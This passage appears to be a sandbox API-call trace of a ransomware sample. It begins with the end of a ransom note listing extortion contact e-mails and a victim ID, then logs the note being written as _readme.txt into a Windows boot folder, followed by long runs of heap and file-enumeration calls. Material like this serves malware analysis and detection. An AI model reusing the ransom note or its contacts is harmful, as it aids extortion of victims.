need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.007] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0201.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.008] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0201.008] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.008] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.008] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.008] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0201.008] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: 